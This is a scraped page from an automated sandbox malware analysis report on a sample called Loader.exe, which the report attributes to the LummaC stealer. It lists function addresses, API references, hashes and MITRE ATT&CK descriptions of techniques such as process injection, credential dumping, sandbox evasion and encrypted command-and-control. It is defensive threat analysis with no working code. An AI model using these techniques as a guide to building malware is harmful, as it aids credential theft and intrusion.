Opcode Fuzzy Hash: 72b334d7ba0816f51b5d8d90aea51ce6904bf724261b3fedc0863ec819f6f9ff
Instruction Fuzzy Hash: BD41797290020DAFCF19CF94CE85EEEBBB5BF48308F189169F90476221D2369952DB51

Function 00ECA04C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00ECA2C3

Strings

csm, xrefs: 00ECA356
csm, xrefs: 00ECA2E5

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: c6d52403e64f23b7cbed75914b3caa252e2a80393005795e8f6484fad3014528
Instruction ID: e0e9f786c6a9a36e47238fdfbdd81b44bf3e79a22e98c1165bc2de9d17b6b334
Opcode Fuzzy Hash: c6d52403e64f23b7cbed75914b3caa252e2a80393005795e8f6484fad3014528
Instruction Fuzzy Hash: BE31C03250029CDBCF228F58DA58EAE7B66EB0871DB1C516EFC5429121C337C863DB82

Function 00EB4B10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EB4B2B

Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBE98
Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBEBC

Strings

^I, xrefs: 00EB4B1C
bad locale name, xrefs: 00EB4B9B

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: Yarn$LockitLockit::_std::_
String ID: ^I$bad locale name
API String ID: 360232963-2946685981
Opcode ID: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
Instruction ID: 2af3c087ecef989d01c827ad86edf440288a344280d7226125cee870566c833c
Opcode Fuzzy Hash: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
Instruction Fuzzy Hash: 6B01ED7090410C9BDB08FFA9D4917EEBBF1AF44308F10546CE64677383CA30AA90CB96

Function 0040B550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(004086C2), ref: 0040B556
FreeLibrary.KERNEL32 ref: 0040B577

Strings

#v, xrefs: 0040B556, 0040B577

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: e4a73d14671516302fc69e37b726d03402eb73aa1b9a91041ce44988f14adb0f
Instruction ID: 9b18566d4e96ae93285f44559f1d2ac0018208de3663c012f330816dda0b2a28
Opcode Fuzzy Hash: e4a73d14671516302fc69e37b726d03402eb73aa1b9a91041ce44988f14adb0f
Instruction Fuzzy Hash: AFC0027D980400AFDF026B61FF0E81C3B39AB5A3067040039A40995033DA7A09389B5B

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
Loader.exe

Function 00EE619E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00ECBD42 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00EB1860 Relevance: 9.2, APIs: 6, Instructions: 162
fileCOMMON

Function 00EBA4D0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477
COMMON

Function 00EB1700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
memoryCOMMON

Function 00EC481D Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Function 00EC49B3 Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Function 00EC4B24 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00EBB510 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON

Function 00ED2D15 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00ED34EE Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00ECC862 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00EC4935 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Function 00EB1B70 Relevance: 3.0, APIs: 2, Instructions: 28
COMMON

Function 00ECAD27 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre